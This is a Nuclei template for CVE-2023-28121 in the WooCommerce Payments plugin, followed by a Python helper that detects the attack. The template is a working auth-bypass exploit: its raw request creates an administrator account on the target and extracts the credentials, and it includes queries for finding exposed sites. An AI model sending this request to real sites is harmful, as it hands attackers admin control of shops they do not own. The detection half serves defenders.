id: CVE-2023-28121

info:
  name: WooCommerce Payments - Unauthorized Admin Access
  author: DhiyaneshDK
  severity: critical
  description: |
    An issue in the WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, such as an administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.
  reference:
    - https://github.com/gbrsh/CVE-2023-28121
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28121
    - https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/
    - https://woocommerce.com/products/woocommerce-payments/
    - https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-28121
    cwe-id: CWE-287
    epss-score: 0.72766
    cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    verified: true
    google-query: inurl:/wp-content/plugins/woocommerce-payments
    publicwww-query: /wp-content/plugins/woocommerce-payments
    vendor: automattic
    product: woocommerce_payments
    framework: wordpress
  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        X-WCPAY-PLATFORM-CHECKOUT-USER: 1
        Content-Type: application/x-www-form-urlencoded

        rest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"registered_date":'
          - '"username":'
          - '"email":'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 201

    extractors:
      - type: dsl
        dsl:
          - '"WP_USERNAME: "+ username'
          - '"WP_PASSWORD: "+ password'
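For defenders triaging traffic against this template's pattern, the following added Python helper (not part of the Nuclei template or the WooCommerce project) inspects a raw HTTP request and flags the combination the description above relies on: the X-WCPAY-PLATFORM-CHECKOUT-USER header together with a POST to the WordPress /wp/v2/users REST route, whether the route is given via ?rest_route=, in the form body, or as a /wp-json/ path. It assumes you have the raw request text available, for example from a reverse-proxy or WAF capture; the sample requests are constructed, not captured traffic.

```python
# Added detection helper for the CVE-2023-28121 request pattern (not the template's code).
from urllib.parse import parse_qs, urlsplit, unquote

ALERT_HEADER = "x-wcpay-platform-checkout-user"   # header the bypass relies on
USERS_ROUTE = "/wp/v2/users"                      # REST route that creates users


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def requested_rest_route(req: dict) -> str:
    """REST route addressed by the request: ?rest_route=, form-body rest_route=,
    or a pretty-permalink /wp-json/ path. Returns '' when none is present."""
    parts = urlsplit(req["path"])
    query_route = parse_qs(parts.query).get("rest_route", [""])[0]
    body_route = ""
    if "application/x-www-form-urlencoded" in req["headers"].get("content-type", ""):
        body_route = parse_qs(req["body"]).get("rest_route", [""])[0]
    if query_route:
        return unquote(query_route)
    if body_route:
        return unquote(body_route)
    if parts.path.startswith("/wp-json/"):
        return "/" + parts.path[len("/wp-json/"):]
    return ""


def is_wcpay_auth_bypass_attempt(raw: str) -> bool:
    """True when the platform-checkout header is present and the request creates a user."""
    req = parse_raw_request(raw)
    if ALERT_HEADER not in req["headers"]:
        return False
    route = requested_rest_route(req).rstrip("/")
    return req["method"] == "POST" and route.startswith(USERS_ROUTE)


# Constructed sample requests (hypothetical host, not captured traffic).
EXPLOIT_LIKE = ("POST / HTTP/1.1\r\nHost: shop.example\r\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                "rest_route=%2Fwp%2Fv2%2Fusers&username=abc&email=a@b.example&password=x&roles=administrator")
BENIGN = "POST /wp-json/wc/v3/orders HTTP/1.1\r\nHost: shop.example\r\nContent-Type: application/json\r\n\r\n{}"
```

Feeding requests through is_wcpay_auth_bypass_attempt gives a hit for EXPLOIT_LIKE and none for BENIGN; on a site that cannot update past 5.6.1 immediately, the same predicate can back a temporary proxy or WAF block rule.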